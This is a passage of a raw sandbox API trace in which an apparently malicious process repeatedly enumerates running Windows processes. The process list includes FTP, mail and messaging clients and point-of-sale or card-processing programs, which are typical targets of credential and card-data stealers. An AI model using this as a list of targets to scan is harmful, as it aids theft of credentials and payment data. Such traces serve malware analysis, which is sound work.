(in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.629] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0264.630] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0264.632] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0264.633] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0264.634] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0264.636] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0264.639] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0264.641] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0264.642] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0264.643] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0264.645] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0264.646] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0264.647] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0264.649] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0264.650] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0264.731] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0264.733] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0264.734] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0264.736] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0264.737] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0264.739] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0264.743] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0264.745] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0264.746] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0264.748] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0264.749] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0264.750] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0264.752] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0264.753] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0264.755] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0264.757] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0264.759] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0264.761] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0264.765] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0264.767] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0264.768] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0264.770] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0264.772] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0264.773] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0264.775] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0264.800] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0264.802] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0264.805] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0264.807] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0264.811] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0264.813] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0264.815] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0264.817] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0264.818] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0264.820] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0264.822] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0264.839] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0264.841] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0264.843] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0264.844] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0264.846] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0264.848] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0264.850] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0264.851] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0264.853] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0264.907] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0264.910] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0264.913] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0264.915] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0264.921] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0264.924] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0264.926] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0264.929] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0264.931] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0264.940] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0264.943] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0264.945] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0265.027] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0265.033] CloseHandle (hObject=0x1d14) returned 1 [0265.033] Sleep (dwMilliseconds=0x64) [0265.143] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0265.162] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.165] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0265.171] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0265.173] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.175] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0265.177] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.180] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0265.223] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0265.225] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0265.226] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 